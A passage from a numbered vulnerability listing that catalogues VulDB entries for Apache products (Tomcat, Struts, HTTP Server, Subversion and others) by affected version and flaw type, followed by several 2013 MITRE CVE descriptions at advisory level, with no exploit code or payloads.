4376| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
4377| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
4378| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
4379| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
4380| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
4381| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
4382| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
4383| [66356] Apache Wicket up to 6.8.0 information disclosure
4384| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
4385| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
4386| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
4387| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
4388| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
4389| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
4390| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
4391| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
4392| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
4393| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
4394| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
4395| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
4396| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
4397| [65668] Apache Solr 4.0.0 Updater denial of service
4398| [65665] Apache Solr up to 4.3.0 denial of service
4399| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
4400| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
4401| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
4402| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
4403| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
4404| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
4405| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
4406| [65410] Apache Struts 2.3.15.3 cross site scripting
4407| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
4408| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
4409| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
4410| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
4411| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
4412| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
4413| [65340] Apache Shindig 2.5.0 information disclosure
4414| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
4415| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
4416| [10826] Apache Struts 2 File privilege escalation
4417| [65204] Apache Camel up to 2.10.1 unknown vulnerability
4418| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
4419| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
4420| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
4421| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
4422| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
4423| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
4424| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
4425| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
4426| [64722] Apache XML Security for C++ Heap-based memory corruption
4427| [64719] Apache XML Security for C++ Heap-based memory corruption
4428| [64718] Apache XML Security for C++ verify denial of service
4429| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
4430| [64716] Apache XML Security for C++ spoofing
4431| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
4432| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
4433| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
4434| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
4435| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
4436| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
4437| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
4438| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
4439| [64485] Apache Struts up to 2.2.3.0 privilege escalation
4440| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
4441| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
4442| [64467] Apache Geronimo 3.0 memory corruption
4443| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
4444| [64457] Apache Struts up to 2.2.3.0 cross site scripting
4445| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
4446| [9184] Apache Qpid up to 0.20 SSL misconfiguration
4447| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
4448| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
4449| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
4450| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
4451| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
4452| [8873] Apache Struts 2.3.14 privilege escalation
4453| [8872] Apache Struts 2.3.14 privilege escalation
4454| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
4455| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
4456| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
4457| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
4458| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
4459| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
4460| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
4461| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
4462| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
4463| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
4464| [64006] Apache ActiveMQ up to 5.7.0 denial of service
4465| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
4466| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
4467| [8427] Apache Tomcat Session Transaction weak authentication
4468| [63960] Apache Maven 3.0.4 Default Configuration spoofing
4469| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
4470| [63750] Apache qpid up to 0.20 checkAvailable denial of service
4471| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
4472| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
4473| [63747] Apache Rave up to 0.20 User Account information disclosure
4474| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
4475| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
4476| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
4477| [7687] Apache CXF up to 2.7.2 Token weak authentication
4478| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
4479| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
4480| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
4481| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
4482| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
4483| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
4484| [63090] Apache Tomcat up to 4.1.24 denial of service
4485| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
4486| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
4487| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
4488| [62833] Apache CXF -/2.6.0 spoofing
4489| [62832] Apache Axis2 up to 1.6.2 spoofing
4490| [62831] Apache Axis up to 1.4 Java Message Service spoofing
4491| [62830] Apache Commons-httpclient 3.0 Payments spoofing
4492| [62826] Apache Libcloud up to 0.11.0 spoofing
4493| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
4494| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
4495| [62661] Apache Axis2 unknown vulnerability
4496| [62658] Apache Axis2 unknown vulnerability
4497| [62467] Apache Qpid up to 0.17 denial of service
4498| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
4499| [6301] Apache HTTP Server mod_pagespeed cross site scripting
4500| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
4501| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
4502| [62035] Apache Struts up to 2.3.4 denial of service
4503| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
4504| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
4505| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
4506| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
4507| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
4508| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
4509| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
4510| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
4511| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
4512| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
4513| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
4514| [61229] Apache Sling up to 2.1.1 denial of service
4515| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
4516| [61094] Apache Roller up to 5.0 cross site scripting
4517| [61093] Apache Roller up to 5.0 cross site request forgery
4518| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
4519| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
4520| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
4521| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
4522| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
4523| [60708] Apache Qpid 0.12 unknown vulnerability
4524| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
4525| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
4526| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
4527| [4882] Apache Wicket up to 1.5.4 directory traversal
4528| [4881] Apache Wicket up to 1.4.19 cross site scripting
4529| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
4530| [60352] Apache Struts up to 2.2.3 memory corruption
4531| [60153] Apache Portable Runtime up to 1.4.3 denial of service
4532| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
4533| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
4534| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
4535| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
4536| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
4537| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
4538| [4571] Apache Struts up to 2.3.1.2 privilege escalation
4539| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
4540| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
4541| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
4542| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
4543| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
4544| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
4545| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
4546| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
4547| [59888] Apache Tomcat up to 6.0.6 denial of service
4548| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
4549| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
4550| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
4551| [59850] Apache Geronimo up to 2.2.1 denial of service
4552| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
4553| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
4554| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
4555| [58413] Apache Tomcat up to 6.0.10 spoofing
4556| [58381] Apache Wicket up to 1.4.17 cross site scripting
4557| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
4558| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
4559| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
4560| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
4561| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
4562| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
4563| [57568] Apache Archiva up to 1.3.4 cross site scripting
4564| [57567] Apache Archiva up to 1.3.4 cross site request forgery
4565| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
4566| [4355] Apache HTTP Server APR apr_fnmatch denial of service
4567| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
4568| [57425] Apache Struts up to 2.2.1.1 cross site scripting
4569| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
4570| [57025] Apache Tomcat up to 7.0.11 information disclosure
4571| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
4572| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
4573| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
4574| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
4575| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
4576| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
4577| [56512] Apache Continuum up to 1.4.0 cross site scripting
4578| [4285] Apache Tomcat 5.x JVM getLocale denial of service
4579| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
4580| [4283] Apache Tomcat 5.x ServletContect privilege escalation
4581| [56441] Apache Tomcat up to 7.0.6 denial of service
4582| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
4583| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
4584| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
4585| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
4586| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
4587| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
4588| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
4589| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
4590| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
4591| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
4592| [54693] Apache Traffic Server DNS Cache unknown vulnerability
4593| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
4594| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
4595| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
4596| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
4597| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
4598| [54012] Apache Tomcat up to 6.0.10 denial of service
4599| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
4600| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
4601| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
4602| [52894] Apache Tomcat up to 6.0.7 information disclosure
4603| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
4604| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
4605| [52786] Apache Open For Business Project up to 09.04 cross site scripting
4606| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
4607| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
4608| [52584] Apache CouchDB up to 0.10.1 information disclosure
4609| [51757] Apache HTTP Server 2.0.44 cross site scripting
4610| [51756] Apache HTTP Server 2.0.44 spoofing
4611| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
4612| [51690] Apache Tomcat up to 6.0 directory traversal
4613| [51689] Apache Tomcat up to 6.0 information disclosure
4614| [51688] Apache Tomcat up to 6.0 directory traversal
4615| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
4616| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
4617| [50626] Apache Solr 1.0.0 cross site scripting
4618| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
4619| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
4620| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
4621| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
4622| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
4623| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
4624| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
4625| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
4626| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
4627| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
4628| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
4629| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
4630| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
4631| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
4632| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
4633| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
4634| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
4635| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
4636| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
4637| [47214] Apachefriends xampp 1.6.8 spoofing
4638| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
4639| [47162] Apachefriends XAMPP 1.4.4 weak authentication
4640| [47065] Apache Tomcat 4.1.23 cross site scripting
4641| [46834] Apache Tomcat up to 5.5.20 cross site scripting
4642| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
4643| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
4644| [86625] Apache Struts directory traversal
4645| [44461] Apache Tomcat up to 5.5.0 information disclosure
4646| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
4647| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
4648| [43663] Apache Tomcat up to 6.0.16 directory traversal
4649| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
4650| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
4651| [43516] Apache Tomcat up to 4.1.20 directory traversal
4652| [43509] Apache Tomcat up to 6.0.13 cross site scripting
4653| [42637] Apache Tomcat up to 6.0.16 cross site scripting
4654| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
4655| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
4656| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
4657| [40924] Apache Tomcat up to 6.0.15 information disclosure
4658| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
4659| [40922] Apache Tomcat up to 6.0 information disclosure
4660| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
4661| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
4662| [40656] Apache Tomcat 5.5.20 information disclosure
4663| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
4664| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
4665| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
4666| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
4667| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
4668| [40234] Apache Tomcat up to 6.0.15 directory traversal
4669| [40221] Apache HTTP Server 2.2.6 information disclosure
4670| [40027] David Castro Apache Authcas 0.4 sql injection
4671| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
4672| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
4673| [3414] Apache Tomcat WebDAV Stored privilege escalation
4674| [39489] Apache Jakarta Slide up to 2.1 directory traversal
4675| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
4676| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
4677| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
4678| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
4679| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
4680| [38524] Apache Geronimo 2.0 unknown vulnerability
4681| [3256] Apache Tomcat up to 6.0.13 cross site scripting
4682| [38331] Apache Tomcat 4.1.24 information disclosure
4683| [38330] Apache Tomcat 4.1.24 information disclosure
4684| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
4685| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
4686| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
4687| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
4688| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
4689| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
4690| [37292] Apache Tomcat up to 5.5.1 cross site scripting
4691| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
4692| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
4693| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
4694| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
4695| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
4696| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
4697| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
4698| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
4699| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
4700| [36225] XAMPP Apache Distribution 1.6.0a sql injection
4701| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
4702| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
4703| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
4704| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
4705| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
4706| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
4707| [34252] Apache HTTP Server denial of service
4708| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
4709| [33877] Apache Opentaps 0.9.3 cross site scripting
4710| [33876] Apache Open For Business Project unknown vulnerability
4711| [33875] Apache Open For Business Project cross site scripting
4712| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
4713| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
4714|
4715| MITRE CVE - https://cve.mitre.org:
4716| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
4717| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
4718| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
4719| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
4720| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
4721| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
4722| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
4723| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
4724| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
4725| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
4726| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
4727| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
4728| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
4729| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
4730| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
4731| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
4732| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
4733| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
4734| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
4735| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
